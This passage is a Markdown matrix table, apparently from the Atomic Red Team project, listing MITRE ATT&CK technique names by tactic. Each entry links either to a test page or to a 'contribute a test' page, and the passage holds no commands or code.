-| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Account Manipulation](../../T1098/T1098.md) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | [Distributed Component Object Model](../../T1021.003/T1021.003.md) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](../../T1546.008/T1546.008.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
-| [Default Accounts](../../T1078.001/T1078.001.md) | Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Additional Azure Service Principal Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Binary Padding](../../T1027.001/T1027.001.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Automated Collection](../../T1119/T1119.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DNS](../../T1071.004/T1071.004.md) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Hash](../../T1550.002/T1550.002.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Bypass User Access Control](../../T1548.002/T1548.002.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | [Domain Account](../../T1087.002/T1087.002.md) | [Pass the Ticket](../../T1550.003/T1550.003.md) | Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| [External Remote Services](../../T1133/T1133.md) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | [At (Linux)](../../T1053.001/T1053.001.md) | [CMSTP](../../T1218.003/T1218.003.md) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Groups](../../T1069.002/T1069.002.md) | [RDP Hijacking](../../T1563.002/T1563.002.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [At (Windows)](../../T1053.002/T1053.002.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [Domain Trust Discovery](../../T1482/T1482.md) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Inter-Process Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | [Credentials in Registry](../../T1552.002/T1552.002.md) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | DCSync [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File and Directory Discovery](../../T1083/T1083.md) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchctl](../../T1569.001/T1569.001.md) | [BITS Jobs](../../T1197/T1197.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Windows Event Logs](../../T1070.001/T1070.001.md) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Account](../../T1087.001/T1087.001.md) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| [Spearphishing Attachment](../../T1566.001/T1566.001.md) | [Launchd](../../T1053.004/T1053.004.md) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bypass User Access Control](../../T1548.002/T1548.002.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Groups](../../T1069.001/T1069.001.md) | [SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Encrypted Channel](../../T1573/T1573.md) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Malicious File](../../T1204.002/T1204.002.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) |
-| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | [Compile After Delivery](../../T1027.004/T1027.004.md) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Share Discovery](../../T1135/T1135.md) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Native API](../../T1106/T1106.md) | [Browser Extensions](../../T1176/T1176.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Compiled HTML File](../../T1218.001/T1218.001.md) | Golden Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [PowerShell](../../T1059.001/T1059.001.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Group Policy Preferences](../../T1552.006/T1552.006.md) | [Password Policy Discovery](../../T1201/T1201.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Control Panel](../../T1218.002/T1218.002.md) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | [Scheduled Task](../../T1053.005/T1053.005.md) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kerberoasting](../../T1558.003/T1558.003.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keylogging](../../T1056.001/T1056.001.md) | | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) |
-| | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keychain](../../T1555.001/T1555.001.md) | [Process Discovery](../../T1057/T1057.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Create Snapshot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keylogging](../../T1056.001/T1056.001.md) | [Query Registry](../../T1012/T1012.md) | Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Data Staging](../../T1074.001/T1074.001.md) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | [Service Execution](../../T1569.002/T1569.002.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) | [Windows Remote Management](../../T1021.006/T1021.006.md) | [Local Email Collection](../../T1114.001/T1114.001.md) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Stop](../../T1489/T1489.md) |
-| | Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [LSA Secrets](../../T1003.004/T1003.004.md) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | [LSASS Memory](../../T1003.001/T1003.001.md) | [Software Discovery](../../T1518/T1518.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
-| | Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Delete Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Checks](../../T1497.001/T1497.001.md) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Application Layer Protocol](../../T1095/T1095.md) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| | System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) | | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | [Unix Shell](../../T1059.004/T1059.004.md) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Direct Volume Access](../../T1006/T1006.md) | [NTDS](../../T1003.003/T1003.003.md) | [System Network Configuration Discovery](../../T1016/T1016.md) | | [Screen Capture](../../T1113/T1113.md) | | [Non-Standard Port](../../T1571/T1571.md) | |
-| | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Emond](../../T1546.014/T1546.014.md) | [Disable Windows Event Logging](../../T1562.002/T1562.002.md) | [Network Sniffing](../../T1040/T1040.md) | [System Network Connections Discovery](../../T1049/T1049.md) | | Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | [Visual Basic](../../T1059.005/T1059.005.md) | [Default Accounts](../../T1078.001/T1078.001.md) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [OS Credential Dumping](../../T1003/T1003.md) | [System Owner/User Discovery](../../T1033/T1033.md) | | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | [Windows Command Shell](../../T1059.003/T1059.003.md) | [Domain Account](../../T1136.002/T1136.002.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | [Password Cracking](../../T1110.002/T1110.002.md) | [System Service Discovery](../../T1007/T1007.md) | | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | [Windows Management Instrumentation](../../T1047/T1047.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | [Password Filter DLL](../../T1556.002/T1556.002.md) | [System Time Discovery](../../T1124/T1124.md) | | | | Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Guessing](../../T1110.001/T1110.001.md) | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | [Emond](../../T1546.014/T1546.014.md) | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Spraying](../../T1110.003/T1110.003.md) | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | [Remote Access Software](../../T1219/T1219.md) | |
-| | | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | [Standard Encoding](../../T1132.001/T1132.001.md) | |
-| | | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Private Keys](../../T1552.004/T1552.004.md) | | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | [External Remote Services](../../T1133/T1133.md) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Account Manager](../../T1003.002/T1003.002.md) | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [LD_PRELOAD](../../T1574.006/T1574.006.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | |
-| | | Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Silver Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | |
-| | | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | [Launch Agent](../../T1543.001/T1543.001.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
-| | | Implant Container Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Daemon](../../T1543.004/T1543.004.md) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
-| | | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Launchd](../../T1053.004/T1053.004.md) | [File Deletion](../../T1070.004/T1070.004.md) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
-| | | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
-| | | [LD_PRELOAD](../../T1574.006/T1574.006.md) | [Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Gatekeeper Bypass](../../T1553.001/T1553.001.md) | Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
-| | | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
-| | | [Launch Agent](../../T1543.001/T1543.001.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [HISTCONTROL](../../T1562.003/T1562.003.md) | | | | | | | |
-| | | [Launch Daemon](../../T1543.004/T1543.004.md) | [Netsh Helper DLL](../../T1546.007/T1546.007.md) | Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | [Launchd](../../T1053.004/T1053.004.md) | Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Files and Directories](../../T1564.001/T1564.001.md) | | | | | | | |
-| | | [Local Account](../../T1136.001/T1136.001.md) | [Parent PID Spoofing](../../T1134.004/T1134.004.md) | [Hidden Users](../../T1564.002/T1564.002.md) | | | | | | | |
-| | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Window](../../T1564.003/T1564.003.md) | | | | | | | |
-| | | [Logon Script (Mac)](../../T1037.002/T1037.002.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | [Netsh Helper DLL](../../T1546.007/T1546.007.md) | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Plist Modification](../../T1547.011/T1547.011.md) | [Indicator Blocking](../../T1562.006/T1562.006.md) | | | | | | | |
-| | | Office Application Startup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | |
-| | | Office Template Macros [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Indicator Removal on Host](../../T1070/T1070.md) | | | | | | | |
-| | | [Office Test](../../T1137.002/T1137.002.md) | [PowerShell Profile](../../T1546.013/T1546.013.md) | [Indirect Command Execution](../../T1202/T1202.md) | | | | | | | |
-| | | Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | | |
-| | | Outlook Home Page [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [InstallUtil](../../T1218.004/T1218.004.md) | | | | | | | |
